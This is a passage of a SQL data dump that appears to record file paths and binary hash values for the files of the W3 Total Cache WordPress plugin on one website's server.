V9','',0,'?'),('@W\Z)h','wp-content/plugins/w3-total-cache/extension-example/Extension_Example_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/extension-example/Extension_Example_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kQJ[e','mžk\\kNgd]ADb(','',0,'?'),('T57D}','wp-content/plugins/w3-total-cache/extension-example/Extension_Example_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/extension-example/Extension_Example_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h8O@9_Z6','_̝+/0o)¿8Qe,g-W%','',0,'?'),('czƨRFj','wp-content/plugins/w3-total-cache/extension-example/w3-total-cache-example.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/extension-example/w3-total-cache-example.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`_2J5ĘH\0','1$#H #©cě,(J6','',0,'?'),('3Cߣt2S!d','wp-content/plugins/w3-total-cache/inc/define.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/define.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ЦGD|\n','e%$eCİxLĞæ upB','',0,'?'),('&>rᠷ','wp-content/plugins/w3-total-cache/inc/email/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/email/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('U0^C)QV%','wp-content/plugins/w3-total-cache/inc/email/minify_error_notification.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/email/minify_error_notification.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{dHBѿP5','[n#%X\"\nl&={q`q2','',0,'?'),('ƻ:bdG&O','wp-content/plugins/w3-total-cache/inc/email/minify_error_notification.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/email/minify_error_notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{dHBѿP5','[n#%X\"\nl&={q`q2','',0,'?'),('Z .E','wp-content/plugins/w3-total-cache/inc/email/support_request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/email/support_request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5(*‡S#*1','{fl9N@c~Zk|6++#=ඝP','',0,'?'),('sy2nj cJwd','wp-content/plugins/w3-total-cache/inc/error.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-^ۙF\"ϳ\"','1rQ>n8f{_,y*','',0,'?'),('\0\'a\rvY#','wp-content/plugins/w3-total-cache/inc/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('Qy^C\nx;','wp-content/plugins/w3-total-cache/inc/lightbox/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('$I ƒ8V','wp-content/plugins/w3-total-cache/inc/lightbox/minify_recommendations.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/minify_recommendations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(L@|m\'*\ZíJ','Y}}6=)\0Ԭ:0.\"fs ','',0,'?'),('2Vʼ|l4C4l','wp-content/plugins/w3-total-cache/inc/lightbox/purchase.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/purchase.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Mz[LW','T 8a*1z?p\Z:ХeV#!Ʊi','',0,'?'),('J^lrl?f{;XֽH','wp-content/plugins/w3-total-cache/inc/lightbox/self_test.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/self_test.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XN?F*o[','3\Zi} OD_afg!,','',0,'?'),('Jvr+(t.U','wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hB@㸴\n\\1i','.h;ku}Hz`_eroCD7','',0,'?'),('i\ZQƠ}\\','wp-content/plugins/w3-total-cache/inc/lightbox/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/lightbox/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y{{*\'','Vd4Nlla]G _r`b\'','',0,'?'),('c,uN+m9l','wp-content/plugins/w3-total-cache/inc/mime/all.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/mime/all.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YOK\r9','ZzRӕ]&֔4]','',0,'?'),('oO&4:','wp-content/plugins/w3-total-cache/inc/mime/cssjs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/mime/cssjs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ſWlj',',\rY0SSLr#5`9RX','',0,'?'),('2;8id','wp-content/plugins/w3-total-cache/inc/mime/html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/mime/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A(iz%hi%H_U','{\n幖ӓ i wgb','',0,'?'),('L(*I','wp-content/plugins/w3-total-cache/inc/mime/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/mime/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),(',U׽x','wp-content/plugins/w3-total-cache/inc/mime/other.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/mime/other.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԘqN{8','c<^Yb ]5h8kکk@X','',0,'?'),(' #+KhXS','wp-content/plugins/w3-total-cache/inc/options/about.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9yWfd\Z5','\nM I!\ZEO*΢w܆','',0,'?'),('hV5n','wp-content/plugins/w3-total-cache/inc/options/browsercache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/browsercache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x:w1CKȥ','&F]%AƊEH \r%\" N;','',0,'?'),('1XpⲫĐa\"b*','wp-content/plugins/w3-total-cache/inc/options/cdn/akamai.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/akamai.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$)\\li\"}~|q','\\DTDpkRA%occFBTYh','',0,'?'),('\'X\\?]*Kl','wp-content/plugins/w3-total-cache/inc/options/cdn/att.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/att.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eOȹ8','+)%\0\0:w4 }s</{7FĤd*x','',0,'?'),('zuL6-','wp-content/plugins/w3-total-cache/inc/options/cdn/azure.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/azure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߞ-P x','%2eP\Z2Ti/ѱ{& .y9','',0,'?'),('.AC','wp-content/plugins/w3-total-cache/inc/options/cdn/cf.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/cf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@!ҍcAtSع/','Mڻ`bL N3aJ>>!','',0,'?'),('s/Q.k5C','wp-content/plugins/w3-total-cache/inc/options/cdn/cf2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/cf2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G2 kWʴ `','\\uSm87@aLw)tEϐ)t','',0,'?'),('ar,pҿX','wp-content/plugins/w3-total-cache/inc/options/cdn/common/cnames-readonly.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/common/cnames-readonly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t4/ UN\'4W','#Z((0/\' (R)\0','',0,'?'),('\'SG8','wp-content/plugins/w3-total-cache/inc/options/cdn/common/cnames.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/common/cnames.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@4 (ZG','<!j pg;/\'2K\ng','',0,'?'),('V~ZBj]K','wp-content/plugins/w3-total-cache/inc/options/cdn/common/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/common/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('ƪ-a\\YLJ','wp-content/plugins/w3-total-cache/inc/options/cdn/cotendo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/cotendo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±dUQ?Gq','&Ώ>>\'>dmvM&','',0,'?'),('mgްH}CX\\','wp-content/plugins/w3-total-cache/inc/options/cdn/edgecast.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/edgecast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r%uy R','z*\Zs!g^6,\0y&+.','',0,'?'),('}wn~JPD;5','wp-content/plugins/w3-total-cache/inc/options/cdn/ftp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' k挫','c\r5jOtJ\09g4m','',0,'?'),('Wy]/OjW','wp-content/plugins/w3-total-cache/inc/options/cdn/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('\"Xd$,_','wp-content/plugins/w3-total-cache/inc/options/cdn/mirror.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/mirror.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','بcOW/','wp-content/plugins/w3-total-cache/inc/options/cdn/rscf.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/rscf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hkv=}O',' [.7g;z3!c 9Mؐw','',0,'?'),('i\nS[ <','wp-content/plugins/w3-total-cache/inc/options/cdn/s3.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/s3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':!\"9.5.o','\'߱o,E}ٽκۃ~hMO/J','',0,'?'),('믯um臎','wp-content/plugins/w3-total-cache/inc/options/cdn/s3_compatible.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn/s3_compatible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_hTH> ','Mo0E3k9mOa_3pQ`,{','',0,'?'),('\"`tt~x','wp-content/plugins/w3-total-cache/inc/options/cdn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/cdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(<$ ?:','\Zs\nBtɵϭuYEnm!U','',0,'?'),('w;\0qF9H]','wp-content/plugins/w3-total-cache/inc/options/common/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/common/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$[EJ','+3S0WqP\ryT۾3S','',0,'?'),('ZY<\0g^i\0Cz{','wp-content/plugins/w3-total-cache/inc/options/common/header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/common/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fߣ=|\'C','>3V֧ jhD +H8,3','',0,'?'),('jQJ:#Ԋx','wp-content/plugins/w3-total-cache/inc/options/common/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/common/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('!:h3ꋴP','wp-content/plugins/w3-total-cache/inc/options/common/top_nav_bar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/common/top_nav_bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Os3ca̭ &]3','2;r֋ב\'6^>GSCJ˅','',0,'?'),('YjejW','wp-content/plugins/w3-total-cache/inc/options/dashboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FQ-x!/0͝O','6?u\neb','wp-content/plugins/w3-total-cache/inc/options/edd/buy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/edd/buy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I6%4SJ#b',';2*_zNT4B5Gj','',0,'?'),(']>lp}<','wp-content/plugins/w3-total-cache/inc/options/enterprise/dbcluster-config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/enterprise/dbcluster-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A6*\'rҺ/','\nACt{8Լ\rifgi%=\\.','',0,'?'),('<œ\n\r ','wp-content/plugins/w3-total-cache/inc/options/enterprise/dbcluster_general_section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/enterprise/dbcluster_general_section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sy0f2Z','0{=O?;—2 ]zӉN9lئ','',0,'?'),('[@Y\nּ[´','wp-content/plugins/w3-total-cache/inc/options/extensions/list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/extensions/list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%9ȟ@e','uɦg9|e\"t&,','',0,'?'),('1CulE;O','wp-content/plugins/w3-total-cache/inc/options/extensions/settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/extensions/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z!̇}n_','Wr(pPe &W1 (','',0,'?'),('+ QXC`?\\Z*','wp-content/plugins/w3-total-cache/inc/options/extensions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\ZQt1','(@Q%2un:34P4Pyh<^','',0,'?'),('n,¹70:vGB','wp-content/plugins/w3-total-cache/inc/options/general.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(kp!rjhP e','&\ZhfJ-` \'O/\nmqc*','',0,'?'),(';?\"`l ','wp-content/plugins/w3-total-cache/inc/options/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('}q#Gjt','wp-content/plugins/w3-total-cache/inc/options/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҥ+*7\\9>-','C!O56& Ujή.5Sϗ','',0,'?'),('G4uKp_i','wp-content/plugins/w3-total-cache/inc/options/minify/ccjs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/ccjs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>3#]v;{)|','93Mk\Z\rM7>4& 0M','',0,'?'),('yW x','wp-content/plugins/w3-total-cache/inc/options/minify/ccjs2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/ccjs2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_xGH','Ỳh.`Z#i9I 3G','',0,'?'),('0q@NŒ>?','wp-content/plugins/w3-total-cache/inc/options/minify/css.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[[Mp ?l','6lt.@.\r\nS','',0,'?'),('hTX-','wp-content/plugins/w3-total-cache/inc/options/minify/html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z kOHp\Z \'ݡ','`K;=I&\n#EISNr','',0,'?'),('9)ubp6- |','wp-content/plugins/w3-total-cache/inc/options/minify/htmltidy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/htmltidy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C/^IyHxt','~oxUD/EERsZB','',0,'?'),('>.sm, .','wp-content/plugins/w3-total-cache/inc/options/minify/htmltidy2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/htmltidy2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x@\"^*fNp;','Yϵ$EgE%E\\\']OlqO','',0,'?'),('O\0l[lq+RS28$','wp-content/plugins/w3-total-cache/inc/options/minify/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('GÂ-$\\','wp-content/plugins/w3-total-cache/inc/options/minify/js.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@(q\rvÜV#','{C=2>/-ѤS;k.J܎+_','',0,'?'),('{|VHDR±','wp-content/plugins/w3-total-cache/inc/options/minify/yuicss2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/yuicss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fxV_șd\0','YApݕ;','',0,'?'),('%wY','wp-content/plugins/w3-total-cache/inc/options/minify/yuijs2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify/yuijs2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b8>_;LUjJ#',']Cm\0~2M6> uϹӒ\nl','',0,'?'),('\'&\r{\'','wp-content/plugins/w3-total-cache/inc/options/minify.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/minify.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PA}R}b*E','ur5Me','wp-content/plugins/w3-total-cache/inc/options/parts/dashboard_banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/parts/dashboard_banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\\5Va','F\"qExŨV\n n\0 ','',0,'?'),('ϭAVIE \'','wp-content/plugins/w3-total-cache/inc/options/parts/memcached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/parts/memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*z\n [&bAz','YjTGQ\Z şRpsV$ɟ\Z28/\n','',0,'?'),('\'\Zsmo7}D','wp-content/plugins/w3-total-cache/inc/options/parts/memcached_extension.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/parts/memcached_extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','  Ă\Z\Z','^jcz9+(C|\'vG>D#7 j','',0,'?'),('^M8j_L','wp-content/plugins/w3-total-cache/inc/options/parts/redis.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/parts/redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M)C쳧t','aJck%5y3wTFu3X-rq','',0,'?'),('ϐBLj~t','wp-content/plugins/w3-total-cache/inc/options/parts/redis_extension.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/parts/redis_extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \n{l`Bʞ','VQ@1qj0bLEe腩 џkAlE','',0,'?'),('jHsh','wp-content/plugins/w3-total-cache/inc/options/support.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/options/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','궊~U8e+ԃiB','-?1zLFсàپhBlh','',0,'?'),('ZA}pkO2','wp-content/plugins/w3-total-cache/inc/popup/cdn_export_file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_export_file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#8|','kHHsF<VXF+h=8 oc','',0,'?'),('TUDƭjõ','wp-content/plugins/w3-total-cache/inc/popup/cdn_export_library.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_export_library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hi.S5<','~HF_ kZ <^g\nu]3aHC|Q','',0,'?'),('b\"_n','wp-content/plugins/w3-total-cache/inc/popup/cdn_import_library.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_import_library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˳;:g{?','z-I |u|TQwBґUQ@%]i','',0,'?'),('fW<h','wp-content/plugins/w3-total-cache/inc/popup/cdn_purge.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_purge.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l%T9X','\Z&5NaF+I$KH4Qx/GsY','',0,'?'),('`!Qarר','wp-content/plugins/w3-total-cache/inc/popup/cdn_queue.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_queue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kgh=$v ~j','`|FpjAb1Y%f~te','',0,'?'),('#(QZN1rU','wp-content/plugins/w3-total-cache/inc/popup/cdn_rename_domain.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/cdn_rename_domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BD(&$#Y',' |YՅv*?F`MB#mCy@6','',0,'?'),('m/p K3q','wp-content/plugins/w3-total-cache/inc/popup/common/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/common/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/KJ~','\r^jZd {!NtH@U@S','',0,'?'),('oap>EjQ_G','wp-content/plugins/w3-total-cache/inc/popup/common/header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/common/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yҙyW\n:m','jabJ]4-Pꓔ~<','',0,'?'),('EC@v&-5\Z','wp-content/plugins/w3-total-cache/inc/popup/common/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/common/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('<\0q/* 9R','wp-content/plugins/w3-total-cache/inc/popup/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/popup/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('oGWڳ3yU g','wp-content/plugins/w3-total-cache/inc/widget/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('/øtJt7u','wp-content/plugins/w3-total-cache/inc/widget/latest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ag[pwtńH(','JL[\'Y iԈϒF]','',0,'?'),(' !Jz+kg','wp-content/plugins/w3-total-cache/inc/widget/latest_ajax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest_ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g[*/u^{HZ','!7Ng~?BS%Ȧ_UBEE','',0,'?'),('Pʻ8&X/& 0%','wp-content/plugins/w3-total-cache/inc/widget/latest_control.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest_control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yIj|','W%+TC/:;[j֓\" oۄ[','',0,'?'),('>ދC;$Oa','wp-content/plugins/w3-total-cache/inc/widget/latest_news.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest_news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z{=3q 2','&&`0xr8 SW `or?4:','',0,'?'),(')M d18','wp-content/plugins/w3-total-cache/inc/widget/latest_news_ajax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest_news_ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\CGe\'>S','S \0M3.>_|Qف-@z','',0,'?'),('fL2aBM9 ','wp-content/plugins/w3-total-cache/inc/widget/latest_news_control.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/widget/latest_news_control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hTjx*4zHc\n','RV9kŕVU:H6.?ت','',0,'?'),('!\nܳu4','wp-content/plugins/w3-total-cache/inc/wizard/template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/inc/wizard/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':`) ','F \0Ѱ0PBUa:f˥','',0,'?'),('kNf-D!m','wp-content/plugins/w3-total-cache/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('#pr`&C0','wp-content/plugins/w3-total-cache/ini/apache_conf/mod_deflate.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/apache_conf/mod_deflate.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','76^S','7ye#B\'!A,Fjklsf','',0,'?'),('ƜqjuI','wp-content/plugins/w3-total-cache/ini/apache_conf/mod_expires.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/apache_conf/mod_expires.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/mdoC`','PΨ =EN5| `|޳UeZ>','',0,'?'),('¤ja,Q߾[FG','wp-content/plugins/w3-total-cache/ini/apache_conf/mod_mime.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/apache_conf/mod_mime.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}&[ Ncf;','\'\'\rʼn䪲ny וI_#{','',0,'?'),('aCJiiKm>','wp-content/plugins/w3-total-cache/ini/apache_conf/mod_rewrite.conf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ini/apache_conf/mod_rewrite.conf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nרFl%A矷y}]H$!','',0,'?'),('tXL鬺6 